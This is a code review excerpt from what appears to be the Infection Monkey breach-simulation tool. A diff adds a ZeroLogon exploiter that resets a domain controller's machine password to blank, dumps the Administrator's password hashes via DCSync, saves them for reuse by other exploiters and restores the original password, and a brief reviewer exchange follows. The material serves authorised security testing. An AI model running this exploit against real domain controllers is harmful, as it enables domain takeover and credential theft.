monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+        authenticator['Credential'] = b'\x00' * 8
+        authenticator['Timestamp'] = 0
+        request['Authenticator'] = authenticator
+        request['ComputerName'] = self.dc_name + '\x00'
+        request['ClearNewPassword'] = b'\x00' * 516
+        return rpc_con.request(request)
+
+    def restore_password(self):
+        LOG.info("Restoring original password...")
+
+        LOG.debug("DCSync; getting admin password's hashes.")
+        admin_pwd_hashes = self.get_admin_pwd_hashes()
+
+        try:
+            if not admin_pwd_hashes:
+                raise Exception("Couldn't extract admin password's hashes.")
+
+            LOG.debug("Getting original DC password's nthash.")
+            original_pwd_nthash = self.get_original_pwd_nthash(admin_pwd_hashes)
+            if not original_pwd_nthash:
+                raise Exception("Couldn't extract original DC password's nthash.")
+
+            # Keep authenticating until successful.
+            LOG.debug("Attempting password restoration.")
+            for _ in range(0, self.MAX_ATTEMPTS):
+                rpc_con = self.attempt_restoration(original_pwd_nthash)
+                if rpc_con is not None:
+                    break
+
+            if rpc_con:
+                LOG.debug("DC machine account password should be restored to its original value.")
+                return True
+            else:
+                raise Exception("Failed to restore password! Max attempts exceeded?")
+
+        except Exception as e:
+            LOG.error(e)
+
+    def get_admin_pwd_hashes(self):
+        options = self.OPTIONS_FOR_SECRETSDUMP.copy()
+        options['target'] = '$@'.join([self.dc_name, self.dc_ip])  # format for DC account - "NetBIOSName$@0.0.0.0"
+        options['target_ip'] = self.dc_ip
+        options['dc_ip'] = self.dc_ip
+
+        dumped_secrets = self.get_dumped_secrets(options=options,
+                                                 remote_name=self.dc_ip,
+                                                 username=f"{self.dc_name}$")
+        user = 'Administrator'
+        for secret in dumped_secrets:
+            if user in secret:
+                hashes = secret.split(':')[2:4]  # format of secret - "domain\uid:rid:lmhash:nthash:::"
+                self.add_extracted_creds_to_exploit_info(user, hashes[0], hashes[1])
+                self.add_extracted_creds_to_monkey_config(user, hashes[0], hashes[1])
+                return ':'.join(hashes)  # format - "lmhash:nthash"
+
+    def add_extracted_creds_to_exploit_info(self, user, lmhash, nthash):
+        self.exploit_info['credentials'].update({
+            user: {
+                'username': user,
+                'password': '',
+                'lm_hash': lmhash,
+                'ntlm_hash': nthash
+            }
+        })
+
+    def add_extracted_creds_to_monkey_config(self, user, lmhash, nthash):  # so other exploiters can use these creds
```

Comment:
I'm not sure it's that simple. Does this update the config in the island? After you successfully run ZeroLogon, can you see credentials extracted when you go to config UI?

Reply:
Yes, because of the changes in `monkey_island/cc/services/reporting/report.py`

Reply:
Yes